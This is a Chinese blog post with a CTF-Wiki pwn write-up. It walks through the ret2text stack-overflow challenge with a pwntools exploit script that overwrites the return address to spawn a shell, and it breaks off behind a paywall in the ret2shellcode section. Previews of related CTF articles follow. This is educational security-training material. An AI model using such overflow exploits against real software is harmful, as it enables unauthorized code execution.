CTFWiki-pwn

已于 2022-05-15 16:35:10 修改
阅读量1.4k 收藏 6
点赞数 2
文章标签: 安全 pwn
于 2022-05-03 16:07:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55233040/article/details/124556463
版权

ctfwiki-pwn

stackoverflow

ret2text

首先checksec一下,是32位可执行文件,没有开启保护
在这里插入图片描述
放入ida,shift+f12查看字符串,发现secure函数中使用system函数调用了"/bin/sh",记下地址0x804863a
在这里插入图片描述
查看偏移地址
在这里插入图片描述
在这里插入图片描述
脚本如下:

from pwn import *
io = process("./ret2text")
payload = b"a"*112 + p32(0x804863a)
io.sendline(payload)
io.interactive()

在这里插入图片描述

ret2shellcode

checksec一下,是32位小端序
在这里插入图片描述
IDA看一下汇编代码,发现没有shell
在这里插入图片描述
找到溢出点
在这里插入图片描述
在这里插入图片描述
buf2所在段有执行权限
在这里插入图片描述
分析偏移地址:112
在这里插入图片描述
构造脚本:


                

                
                
        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  悸动战士cosmos
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
pwn-Format String之hijack GOT

				
			

			

				

					admin的博客
				

				

					10-07
					
					357
					
				

			

		

		

			
				
题目来源:ctf-wiki的hijack GOT。

例子 - CTF Wiki (ctf-wiki.org)

CTF上的wp有点简洁,复现的时候遇到很多小问题,在这里记录一下。


①、checksec和IDA




程序的主干代码:没必要一次性看完,下面我们一点一点分析
//main
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  signed int v3; // eax
  cha..

			
		

	



                

              
                



	

		

			

				
					
跟着CTF-wikipwn——ret2text

				
			

			

				

					qq_42882717的博客
				

				

					06-21
					
					1155
					
				

			

		

		

			
				
肾么叫做万死不辞呀,就是每天被气死一万次,也不辞职…(哭哭

			
		

	



                


  
              

                


	

		

			

				
					
【网络安全】适合新手的CTF靶场合集(必看)

				
			

			

				

					wuli1024的博客
				

				

					01-18
					
					1982
					
				

			

		

		

			
				
我整理得没有那么全,这里的合集主要还是面对新手。做题贵精不在多,好好练习每一题,学习每个知识点,不懂的百度或者 Google 即可。记住,你是为了提高自己而去打 CTF

			
		

	





	

		

			

				
					
跟着CTF-wikipwn——前言

				
			

			

				

					qq_42882717的博客
				

				

					06-18
					
					1460
					
				

			

		

		

			
				
对于有一定pwn基础的同学来讲,CTF-wiki就是yyds,绝绝子,很上头呀。不过简洁有力的另一方面,是细节不彻底,因此本系列文章专为解决CTF-wiki的细节问题

			
		

	



		

			
		



	

		

			

				
					
网络安全ctf比赛/学习资源整理(非常详细)零基础入门到精通,收藏这一篇就够了

					
最新发布

				
			

			

				

					Libra1313的博客
				

				

					07-17
					
					1044
					
				

			

		

		

			
				
1、CTF在线工具箱:http://ctf.ssleye.com/    包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.net/Category.php?Id=273、ctfhub在线工具:https://www.ctfhub.com/#/tools4、还有一些常用的网站字符串2进制互转:http://www.5ixuexiwang.com/str/from-binary.php。

			
		

	





	

		

			

				
					
ctf wiki pwn(入门实操)

				
			

			

				

					至臻求学,胸怀云月
				

				

					01-11
					
					2440
					
				

			

		

		

			
				
gets函数溢出
源码
#include <stdio.h>
#include <string.h>

void success()
{
        puts("you are succeed!");
}

void volunter()
{
        char s[12];
        gets(s);
        puts(s);
        re...

			
		

	





	

		

			

				
					
kernel简单学习(CTF-wiki)

				
			

			

				

					njh18790816639的博客
				

				

					10-31
					
					1061
					
				

			

		

		

			
				
就从CTF WIKI的例题开始吧,此具有由易到难的特性,适合上手;

			
		

	





	

		

			

				
					
ctf-wiki 基本ROP

				
			

			

				

					农夫果园好好喝的博客
				

				

					07-11
					
					495
					
				

			

		

		

			
				
ret2text
原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。
这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。
流程...

			
		

	





	

		

			

				
					
ctfwiki---基本ROP

				
			

			

				

					xuqi7
				

				

					11-29
					
					2187
					
				

			

		

		

			
				
ctfwiki,基本ROP(Return Oriented Programming)复现

			
		

	





	

		

			

				
					
跟着CTF-wikipwn——ret2shellcode

				
			

			

				

					qq_42882717的博客
				

				

					07-01
					
					843
					
				

			

		

		

			
				
CTF-wiki的注解:ret2shellcode

			
		

	





	

		

			

				
					
CTF Wiki 2017.12.27

				
			

			

				

					01-20
				

			

		

		

			
				
CTF Wiki 2017.12.27
CTF Wiki 2017.12.27
CTF Wiki 2017.12.27

			
		

	





	

		

			

				
					
ctf-wiki-en:流行的ctf-wiki的完整英文版

				
			

			

				

					05-13
				

			

		

		

			
				
CTF维基
欢迎使用CTF WikiCTF (Capture The Flag)是从DEFCON CTF开始的, DEFCON CTF是计算机安全爱好者之间的竞争性游戏,最初于1996年举办。
 CTF涵盖了广泛的领域。 随着安全技术的发展, CTF挑战的难度越来越大。 结果,初学者的学习曲线越来越陡峭。 大多数在线信息是零散的和琐碎的。 初学者通常不知道如何系统地学习CTF ,这需要大量的工作和精力。
 为了让对CTF感兴趣的人轻松入门,2016年10月,在Github上建立了CTF Wiki 。 随着时间的推移,随着内容的逐步改进, CTF Wiki得到了安全爱好者的广泛赞赏,其中许多人是我们认为我们永远不会见面的人。
 作为一个自由站点,主要关注最新的CTFCTF Wiki引入了CTF各个方面的知识和技术,使初学者更容易学习CTF 。
 现在,周大福主要维基包含了CTF

			
		

	





	

		

			

				
					
ctf-wikiCTF Wiki的新起点! 快来加入我们,我们需要您!

				
			

			

				

					02-04
				

			

		

		

			
				
CTF维基
 欢迎使用CTF WikiCTF (Capture The Flag)是从DEFCON CTF开始的, DEFCON CTF是计算机安全爱好者之间的竞争性游戏,最初于1996年举办。
 CTF涵盖了广泛的领域。 随着安全技术的不断发展, CTF挑战的难度越来越大。 结果,初学者的学习曲线越来越陡峭。 大多数在线信息是零散的和琐碎的。 初学者通常不知道如何系统地学习CTF ,这需要大量的工作和精力。
 为了让对CTF感兴趣的人轻松入门,2016年10月,在Github上建立了CTF Wiki 。 随着时间的推移,随着内容的逐渐改进, CTF Wiki得到了安全爱好者的高度赞赏

			
		

	





	

		

			

				
					
CTF Wiki是一个免费开放且持续更新的知识整合站点-python

				
			

			

				

					06-18
				

			

		

		

			
				
CTF Wiki是一个免费开放且持续更新的知识整合站点,你可以在这里学到关于CTF竞赛及网络安全相关的有趣知识,我们为你准备了CTF竞赛中的基础知识、常见题型、解题思路以及常用工具等,帮助你更快速地了解CTF竞赛以及网络安全

			
		

	





	

		

			

				
					
Python-CTFWiki是一个免费开放且持续更新的知识整合站点

				
			

			

				

					08-12
				

			

		

		

			
				
CTF Wiki是一个免费开放且持续更新的知识整合站点,你可以在这里学到关于CTF竞赛及网络安全相关的有趣知识,我们为你准备了CTF竞赛中的基础知识、常见题型、解题思路以及常用工具等,帮助你更快速地了解CTF竞赛以及网络安全

			
		

	





	

		

			

				
					
pwn学习-ctfwiki-UAF

				
			

			

				

					WocW的博客
				

				

					05-23
					
					2277
					
				

			

		

		

			
				
源码:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

struct note {
  void (*printnote)();
  char *content;
};

struct note *notelist[5];
int count = 0;

void print_note_co...

			
		

	





	

		

			

				
					
PWN学习,对CTF-wiki上的讲解进行一些补充

				
			

			

				

					qq_33948522的博客
				

				

					06-27
					
					5660
					
				

			

		

		

			
				
`基本知识
ROP
Return Oriented Programming,其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。
一般的栈结构:
      高地址                                +-----------------+
                         ...

			
		

	





	

		

			

				
					
CTFWiki_PWN_LinuxPlatform_UserMode_Exploitation_StackOverflow_x86

				
			

			

				

					A的博客
				

				

					06-14
					
					685
					
				

			

		

		

			
				
先看这个文章学习函数调用栈出栈时RIP指向栈存放函数返回地址的位置,这个地址我们可以改为一个汇编指令的地址,RIP一直往后面指,以那个地址为起点一直往后执行
把函数返回地址设为0804863A,会一直往后执行
ret2shellcode
把恶意汇编代码写到数组(代码块)里面,返回地址指向这个数组(代码块)首地址。
这个数组要可读写执行,全局变量(.bss)有这个特点
ljust() 用法
shellcraft.sh() 打印结果
计算偏移disass main反汇编 main 函数找到 main 的第一条指

			
		

	





	

		

			

				
					
pwn 口算 ctf

				
			

			

				

					10-15
				

			

		

		

			
				
好的,我明白了。对于你的问题,我可以给出以下回答:

pwn 口算 ctf 是一种 CTF 竞赛中的题目类型,主要考察选手对于二进制漏洞利用和计算机底层知识的掌握程度。这类题目通常会提供一个二进制文件,选手需要通过分析程序的漏洞,编写相应的 exploit 脚本,从而获取程序的控制权,并在程序中执行指定的操作。



			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值